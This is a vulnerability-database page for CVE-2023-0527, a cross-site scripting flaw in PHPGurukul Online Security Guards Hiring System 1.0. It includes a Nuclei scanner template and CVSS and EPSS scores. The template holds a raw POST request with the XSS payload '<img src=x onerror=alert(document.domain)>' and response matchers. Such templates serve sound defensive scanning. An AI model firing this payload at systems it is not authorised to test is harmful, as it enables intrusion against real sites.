Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-0527
HistoryJun 26, 2023 - 4:06 p.m.

Online Security Guards Hiring System - Cross-Site Scripting

2023-06-2616:06:27
ProjectDiscovery
github.com
8
cve2023
packetstorm
osghs
xss
online_security_guards_hiring_system_project
search-request
php
vulnerability

CVSS2

4

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:L/Au:S/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

AI Score

6.1

Confidence

High

EPSS

0.005

Percentile

76.1%

A vulnerability was found in PHPGurukul Online Security Guards Hiring System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file search-request.php.
id: CVE-2023-0527

info:
  name: Online Security Guards Hiring System - Cross-Site Scripting
  author: Harsh
  severity: medium
  description: |
    A vulnerability was found in PHPGurukul Online Security Guards Hiring System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file search-request.php.
  remediation: |
    Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://vuldb.com/?ctiid.219596
    - https://nvd.nist.gov/vuln/detail/CVE-2023-0527
    - https://github.com/ctflearner/Vulnerability/blob/main/Online-Security-guard-POC.md
    - http://packetstormsecurity.com/files/172667/Online-Security-Guards-Hiring-System-1.0-Cross-Site-Scripting.html
    - https://vuldb.com/?id.219596
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-0527
    cwe-id: CWE-79
    epss-score: 0.0047
    epss-percentile: 0.75559
    cpe: cpe:2.3:a:online_security_guards_hiring_system_project:online_security_guards_hiring_system:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: online_security_guards_hiring_system_project
    product: online_security_guards_hiring_system
  tags: cve2023,cve,packetstorm,osghs,xss,online_security_guards_hiring_system_project

http:
  - raw:
      - |
        POST /search-request.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        searchdata=<img%20src=x%20onerror=alert(document.domain)>&search=

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains(body, "<img src=x onerror=alert(document.domain)>")'
          - 'contains(body, "Online Security Gauard Hiring System |Search Request")'
        condition: and
# digest: 4a0a00473045022100a343a32d329fb055c3eb661448e738379aff505ebe733d9e4b567f04dc5ca39a02201abb22ff3473d17db6dd210c33705f9fadee48d87fe5298dbad7c057a203e6e8:922c64590222798bb761d5b6d8e72950

CVSS2

4

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:L/Au:S/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

AI Score

6.1

Confidence

High

EPSS

0.005

Percentile

76.1%

Related for NUCLEI:CVE-2023-0527